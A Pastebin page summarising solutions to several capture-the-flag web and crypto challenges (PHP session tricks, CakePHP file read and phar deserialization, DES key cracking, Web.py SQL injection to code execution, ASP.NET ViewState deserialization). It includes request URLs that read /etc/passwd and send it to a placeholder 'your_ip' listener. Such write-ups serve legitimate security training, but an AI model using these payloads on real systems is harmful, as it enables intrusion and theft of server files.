Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- One Line PHP Challenge
- Difficulty: ★★★★☆
- Solved: 3 / 1816
- Tag: PHP
- Source Code
- index.php
- Solution
- P.S. This is a default installation PHP7.2 + Apache on Ubuntu 18.04
- Control partial session file content by PHP_SESSION_UPLOAD_PROGRESS
- Bypass session.upload_progress.cleanup = On by race condition or slow query
- Control the prefix to @<?php by chaining PHP wrappers
- exp_for_php.py
- Write Ups
- TBD
- Baby Cake
- Difficulty: ★★★
- Solved: 4 / 1816
- Tag: Code Review, PHP, De-serialization
- Source Code
- index.php
- Solution
- Due to the implement of CURLOPT_SAFE_UPLOAD in CakePHP FormData.php. We can read arbitrary files!
- # arbitrary file read, listen port 12345 on your server
- http://13.230.134.135/
- ?url=http://your_ip:12345/
- &data[x]=@/etc/passwd
- # arbitrary de-serialization the Monolog POP chain
- http://13.230.134.135/
- ?url=http://your_ip:12345/
- &data[x]=@phar://../tmp/cache/mycache/[you_ip]/[md5_of_url]/body.cache
- exploit.phar
- Write Ups
- TBD
- Oh My Raddit
- Difficulty: ★7★
- Solved: 2 / 1816
- Tag: Observation, DES checksum, Crypto, Web
- Source Code
- app
- Solution
- Know ECB mode from block frequency analysis
- Know block size = 8 from cipher length
- From the information above, it's reasonable to use DES in real world
- The most common block is 3ca92540eb2d0a42(always in the cipher end). We can guess it's the padding \x08\x08\x08\x08\x08\x08\x08\x08
- Due to the checking parity in DES, we can reduce the keyspace from 26(abcdefghijklmnopqrstuvwxyz) to 14(acegikmoqsuwyz)
- Break in 1 second with HashCat
- Break in 10 minutes with single thread Python
- Write Ups
- TBD
- Oh My Raddit v2
- Difficulty: ★★
- Solved: 10 / 1816
- Tag: Web.py, SQL Injection to RCE
- Source Code
- app
- Solution
- Read the package version from requirements.txt
- Remote Code Execution in Web.py framework
- exp.py
- Write Ups
- TBD
- Why so Serials?
- Difficulty: ★★★★
- Solved: 1 / 1816
- Tag: De-serialization, RCE, ASP.NET, View State
- Source Code
- index.php
- Solution
- Get the machineKey in web.config by Server-Side-Includes(.shtml or .stm)
- Exploit ASP.NET ___VIEWSTATE by ysoserial.net
- Write Ups
- TBD
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement